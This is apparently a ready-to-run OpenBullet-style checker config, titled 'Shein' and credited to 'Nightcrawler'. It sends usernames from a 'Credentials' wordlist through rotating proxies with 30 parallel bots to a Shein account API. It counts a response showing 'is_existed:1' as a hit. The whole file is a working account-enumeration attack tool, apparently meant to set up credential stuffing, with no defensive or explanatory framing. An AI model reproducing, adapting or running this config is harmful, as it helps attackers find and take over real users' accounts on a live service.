[SETTINGS]
{
  "Name": "Shein",
  "SuggestedBots": 30,
  "MaxCPM": 0,
  "LastModified": "2023-11-08T02:24:29.0488505+00:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Nightcrawler",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "Credentials",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api-service.shein.com/user/account/positioning" 
  CONTENT "alias=<USERNAME>&alias_type=1&area_abbr=MA&area_code=212&challenge=&page_source=continue&validate=1" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=utf-8" 
  HEADER "Host: api-service.shein.com" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "SiteUID: app" 
  HEADER "Content-Length: 148" 
  HEADER "Accept-Language: en-GB,en-US;q=0.9,en;q=0.8" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: /" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=utf-8" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "is_existed\":0" 
  KEYCHAIN Success OR 
    KEY "is_existed\":1" 

